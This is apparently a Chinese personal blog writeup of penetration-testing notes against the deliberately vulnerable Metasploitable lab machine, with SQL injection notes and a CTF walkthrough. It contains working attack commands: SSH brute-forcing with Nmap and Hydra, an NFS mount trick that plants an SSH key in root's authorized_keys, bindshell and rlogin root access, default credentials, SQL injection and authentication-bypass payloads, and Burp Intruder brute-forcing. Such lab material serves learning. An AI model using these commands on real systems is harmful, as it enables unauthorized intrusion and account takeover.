writeup:Metasploitable

date
Aug 5, 2021 12:02 PM
Related to 日程数据 1 (blog)
tags
Writeup
Website
slug
7
summary
writeup3
还有vlnux漏洞库
 
信息搜集
  1. nmap搜c段
  1. 弱密码
    1. > 使用nmap爆破:命令如下:nmap -p 22 --script=ssh-brute --script-args userdb=用户字典,passdb=密码字典 目标机ip
      
      > 使用hydra爆破:
      
      > hydra -l root -P ssh_password.txt   ssh://目标机ip  -v
      
      > nmap -p- -sV -A -T4 192.168.126.131 -oX 131.xml -v
      
      > p- 指的是将目标端口指定为全部有效端口, A 即all oX输出为常用的xml文件  v为verbosity
  1. ftp(21)弱密码及2.3.4版漏洞
    1. msfconsole
      setg LHISTS ip
      setg RHOSTS ip
      setg LPORT 7890
      search #sea tab
      use
      run
      show info   #sh 
      # 可以tab补全
      
  1. appche2.2.8版(80)的php_cgi参数注入漏洞
  1. mount挂载(111&&2049) 实现ssh密钥登录
    1. 本地创建靶机同uid账号 useradd -u 2008 -d /home/vulnix -m vulnix 后切换以欺骗文件读取操作权限
      rpcinfo -p ip
      showmount -e ip  
      ssh-keygen
      mkdir /tmp/13
      mount -t nfs ip:/ /tmp/13/
      cat ~/.ssh/id_rsa.pub >>/tmp/13/root/.ssh/authorized_keys
      unmount /tmp/13
      ssh root@ip
  1. samba(139)使用usermap idwhoami 好用
  1. Rlogin(513)use 免密登录 rlogin -l root ip
  1. java-rmi(1099) use java_rmi distcc
  1. bindshell(1524) 免密码 nc ip 1524
  1. mysql(3306) 空口令
  1. postgres 弱口令(5432)
  1. vnc 弱口令(5900)
  1. irc(6667)use ircd
  1. ajp13(8009)匿名访问
  1. tomcat(8180)弱口令 tomcat/tomcat
sql注入
select group_concat(user) from user;
//tables
//columns
//schemata
//注入类型  1"--+a  或 1'--+q  +后必须有非&的任意字符   --为注释
//注入类型  1 and 1=1
//order by  4 判断字段数
//union+select+1,2,3--+p联合查询 前面语句错误union后面的才能执行
//UNION 内部的每个 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每个 SELECT 语句中的列的顺序必须相同。
//+ 代替空格
  1. 找到回显位置
    1. /* 整型注入 */
      sql-bool.php?name=user1 and 1=1
      sql-bool.php?name=user1 and 1=2
      /* 字符型注入 */
      sql-bool.php?name=user1' and '1'='1
      sql-bool.php?name=user1' and '1'='2
      /* 字符型注入 */
      sql-bool.php?name=user1" and "1"="1
      sql-bool.php?name=user1" and "1"="2
  1. 爆库
    1. select GROUP_CONCAT(SCHEMA_NAME) from information_schema.SCHEMATA ;
      SELECT GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES t ;
      SELECT GROUP_CONCAT(COLUMN_NAME) from information_schema.`COLUMNS` c ; 
       
      SELECT DATABASE();
ascii 65(A)-122(z) 48(0)-57(9)
CTF
notion image
notion image
 
flag1:n1book{info_1
notion image
flag2:s_v3ry_im
notion image
得到n1book{info_1s_v3ry_imp0rtant_hack}
</div>
<script src="js/common.js"></script> 
<script src="js/play.js"></script> 
<script src="js/AI.js"></script> 
<script src="js/bill.js"></script>
<script src="js/[abcmlyx]{2}ctf[0-9]{3}.js"></script>  
<script src="js/gambit.js"></script>
正则表达式爆破
  1. 查看原码
  1. 发现奇怪的js
  1. 是个正则的表达式,使用burp suite 爆破
  1. 抓包 intruder
    1. notion image
  1. 注意选择攻击类型为clusterbomb
    1. notion image
  1. 依次修改变量$1$等
    1. notion image
      notion image
  1. 开始攻击
    1. notion image
由于网站后台在进行数据库查询的时候没有对单引号进行过滤,当输入用户名【admin】和万能密码【2'or'1】时,执行的SQL语句为【Select user_id,user_type,email From users Where user_id='admin' And password='2'or'1'】。同时,由于SQL语句中逻辑运算符具有优先级,【=】优先于【and】,【and】优先于【or】,且适用传递性。因此,此SQL语句在后台解析时,分成两句【Select user_id,user_type,email From users Where user_id='admin' And password='2'】和【'1'】,两句bool值进行逻辑or运算,恒为TRUE。SQL语句的查询结果为TRUE,就意味着认证成功,也可以登录到系统中
 
 
 

© lewoking 2021 - 2022